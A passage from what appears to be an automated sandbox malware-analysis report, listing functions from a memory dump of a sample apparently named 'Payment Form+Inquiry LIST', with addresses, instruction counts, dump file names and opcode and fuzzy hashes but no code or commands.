                            • Opcode Fuzzy Hash: 42c7ba14f30e3ea73d2a5bba1dd5255a1b4ce2924ed444ed1f271061779197f3
                            • Instruction Fuzzy Hash: 2512E333A18B428AEA10CB22E60477963A5FB55B94F544231CA5D87BD4CF3FE449C78D
                            Function 00007FF6E825BB60 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                            • Instruction ID: 97cc1842619d7ad6c609d5d2e8e31a35a87730b0a65645b630b007384d824059
                            • Opcode Fuzzy Hash: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                            • Instruction Fuzzy Hash: 02D1CDB3B107498BE7188F39A60526932A2E744BE8F141235CE5D47BDCDF3AD910C789
                            Function 00007FF6E8285490 Relevance: 1.0, Instructions: 950COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 403d853accab671321e6428cea3bc8e22a4cafdc399a328a43a78b81db51eab1
                            • Instruction ID: f6364d750e624f1b47fb3591cf162dd457215d3482d6f496b06c16b886341352
                            • Opcode Fuzzy Hash: 403d853accab671321e6428cea3bc8e22a4cafdc399a328a43a78b81db51eab1
                            • Instruction Fuzzy Hash: 0992BF63A1CA46C9EE418BB5AA407B4A395FF54BC4F454236D90ED3361EE3FE049834E
                            Function 00007FF6E82863B0 Relevance: .7, Instructions: 655COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 663cb1b513d747172d33621aad4c006f1f54a1c76b72a9c74f0a92d891e25ed0
                            • Instruction ID: 4bd424d9096748d547be82348db199cd74a9612766bea886dc06ee14e33f6669
                            • Opcode Fuzzy Hash: 663cb1b513d747172d33621aad4c006f1f54a1c76b72a9c74f0a92d891e25ed0
                            • Instruction Fuzzy Hash: DD529D33B08B458AEB108F75E5442AD77A1FB48B88B044535EE4E97B88CE3EE455C74D
                            Function 00007FF6E8286D80 Relevance: .6, Instructions: 574COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f43b6c74be654565ad4a547809dde052e2382720aa5b1e6440db89c10b1f5e0
                            • Instruction ID: 3cd3e096637054ab65f87895d7b293c1dd98507e621236458f8137d9eb9d18a8
                            • Opcode Fuzzy Hash: 2f43b6c74be654565ad4a547809dde052e2382720aa5b1e6440db89c10b1f5e0
                            • Instruction Fuzzy Hash: B532B123B096468EEF10CBB5D6413BC27B5EB04798B044536DE0DA7B88DE3AE455C38E
                            Function 00007FF6E8276860 Relevance: .4, Instructions: 431COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa5bc22fa0d592459f6b9aea6ff0628d5a97a275616a507ad5fe3cda84cb54be
                            • Instruction ID: 322ac495ba2e14a285b95344b703ee625fda47eac86f05b89ef187293596d2b3
                            • Opcode Fuzzy Hash: fa5bc22fa0d592459f6b9aea6ff0628d5a97a275616a507ad5fe3cda84cb54be
                            • Instruction Fuzzy Hash: CD127FE3A19B9685EE558B2AC24436867A0FF15BA4F549235CE2C833D4DF2ED490C38D
                            Function 00007FF6E82EC7C0 Relevance: .4, Instructions: 430COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e2e59dcd522b5fee78a2a5929f8b7ce2f35e885a2ab0bfb27a88b49f3e1c0e6
                            • Instruction ID: 3a270af831fbe9f92a80e71adfe63ed14f20bbb10f9c7697db030572e76adb65
                            • Opcode Fuzzy Hash: 9e2e59dcd522b5fee78a2a5929f8b7ce2f35e885a2ab0bfb27a88b49f3e1c0e6
                            • Instruction Fuzzy Hash: EEF16C63F395428AF73A4B7899013BD6252EF91300F149234DE9D867D8EE3EB545838E
                            Function 00007FF6E8271930 Relevance: .4, Instructions: 412COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5774a83956436ea9650049361b529952f7d0fdaf0821fa971780029ab67f058c
                            • Instruction ID: 319a04260796095cc407108e0084be777c3dfad4ef2eaabe4ae7e53fe14e2922
                            • Opcode Fuzzy Hash: 5774a83956436ea9650049361b529952f7d0fdaf0821fa971780029ab67f058c
                            • Instruction Fuzzy Hash: 0602C173A18A568AEB148F26E54077877A4EB45BA4F404336CA2DD37D0CE3EE445D38E
                            Function 00007FF6E8271384 Relevance: .4, Instructions: 357COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuery
                            • String ID:
                            • API String ID: 2783962273-0
                            • Opcode ID: 3873401cc29a64d4835b404b5cf653db674c3fe01e3e887d54f3cbf4728210a1
                            • Instruction ID: 115d6518746dcf76cdb7ba3c552b2a9a1c0a9bbdc7cd109b4410ffc55c33c030
                            • Opcode Fuzzy Hash: 3873401cc29a64d4835b404b5cf653db674c3fe01e3e887d54f3cbf4728210a1
                            • Instruction Fuzzy Hash: 65027D23A1EB4289FA56CB36A65037427A0EF49B54F144235C94DD33E1EF2FE485838E
                            Function 00007FF6E825B2C0 Relevance: .3, Instructions: 320COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                            • Instruction ID: 5602bfadc9e3a4e35c642bc6793e9406642ebe7db9d27953bb6c60c57084c75a
                            • Opcode Fuzzy Hash: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                            • Instruction Fuzzy Hash: DFD199B3A10B8887DB598F25E144BA837A9E358BC8F544035DE0E4BB48DF3AD644C799
                            Function 00007FF6E82D2370 Relevance: .3, Instructions: 270COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 71cd0c75e6ab553efdd18d262626b66860fc490dc7584f3d9d49c0599144227e
                            • Instruction ID: 819ca9f1f03da823ccd9243376d91d143b7ee4f662f6ff309168f69f6a93f615
                            • Opcode Fuzzy Hash: 71cd0c75e6ab553efdd18d262626b66860fc490dc7584f3d9d49c0599144227e
                            • Instruction Fuzzy Hash: DF61C456E5810699ED18BF71EE522F5D2211F667C0F486031E81EDB3A7EE1EE414838F
                            Function 00007FF6E8267DC0 Relevance: .3, Instructions: 259COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5762b799f3305f6e0b7145ec92ccacad67020ae1ca7e41aea82d14c1835ef4c4
                            • Instruction ID: dfb97300b1b299205bd2ac23a7cd5a0c73e0b7d0f493f951cf0f2081522c87e6
                            • Opcode Fuzzy Hash: 5762b799f3305f6e0b7145ec92ccacad67020ae1ca7e41aea82d14c1835ef4c4
                            • Instruction Fuzzy Hash: 48D17E73A19B86CAEB60CB25E94037A23A0FB44788F500136DA4ED7795DF3EE454934E
                            Function 00007FF6E8300A40 Relevance: .3, Instructions: 256COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d656be2fc42ab3883681df19188e13d39df0aeda41bad739dea8a081c1c5562
                            • Instruction ID: f29006bd8ae2c0ddadccf07acf9574330f490b59c4e803fdf207e3c9c045efde
                            • Opcode Fuzzy Hash: 6d656be2fc42ab3883681df19188e13d39df0aeda41bad739dea8a081c1c5562
                            • Instruction Fuzzy Hash: 32713823B182958BE7218A79D41067D77A2FB94B90B5C8031DE4DC3752EE3EE981CB49
                            Function 00007FF6E827B850 Relevance: .3, Instructions: 254COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0453e19dfc7ad4426b72ded32b62588a17e37f029ce001c14ce8f531d32280b2
                            • Instruction ID: 2c7d974527b254eefdc9277a475c0901f71c759d61c5ec48e5b5d52759e7e7cc
                            • Opcode Fuzzy Hash: 0453e19dfc7ad4426b72ded32b62588a17e37f029ce001c14ce8f531d32280b2
                            • Instruction Fuzzy Hash: 1CC18B33A08A56CAEA418B26E944379B7A4FB45BA0F444235C96DC37E0DF3FE454834E
                            Function 00007FF6E8285060 Relevance: .2, Instructions: 249COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2fa29cdb42d2da5d2a1cb382fdd01582e1dd84cd6854ef41fb11d5e5d448b2bd
                            • Instruction ID: 8eb58efb5d854a4c6fd981dc748608c822819f7edf6db8c62a92b179210fde53
                            • Opcode Fuzzy Hash: 2fa29cdb42d2da5d2a1cb382fdd01582e1dd84cd6854ef41fb11d5e5d448b2bd
                            • Instruction Fuzzy Hash: BEC17B33A1CB56C5EA418B75EA44378B7A4FB447A0B844236C96DC36A0DF3EE458C34E
                            Function 00007FF6E8257EA0 Relevance: .2, Instructions: 238COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                            • Instruction ID: e6357e8411898ff3c73e852c5ae411a8ab81f2b10dae2b72609b4a37dc7b49e2
                            • Opcode Fuzzy Hash: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                            • Instruction Fuzzy Hash: E591F2B3A20B598BDB18CF39E84122933A1F744BA8F105239CE6D57B88DF79D811C785
                            Function 00007FF6E835E2E0 Relevance: .2, Instructions: 150COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dbe7c808bec65e3882e103644840c7af6a4aa66a393724a9225809d89a4f1159
                            • Instruction ID: 304305f66529f85968a0bced9b2956291527656ca68b3199fddf249a652fa8c1
                            • Opcode Fuzzy Hash: dbe7c808bec65e3882e103644840c7af6a4aa66a393724a9225809d89a4f1159
                            • Instruction Fuzzy Hash: 4F41B6A3E095525DF904ABB2EE416F956115F55BC0F088032EC0DC77A7DE1DE905838F
                            Function 00007FF6E8269660 Relevance: .1, Instructions: 125COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 85569dd02a429fef85fd4d4aefabcf79cb73da6cc72384ed959d552acf564441
                            • Instruction ID: 89b3eac533dda1d9aad8b9f9a6dcc2176474115d61160813791f9cf949fc8ee0
                            • Opcode Fuzzy Hash: 85569dd02a429fef85fd4d4aefabcf79cb73da6cc72384ed959d552acf564441
                            • Instruction Fuzzy Hash: DC4118A3E3CB0A86E9068B37664073491429F5A3E0E28C731D91DE77D1EF2E7085564F
                            Function 00007FF6E827BC70 Relevance: .1, Instructions: 116COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
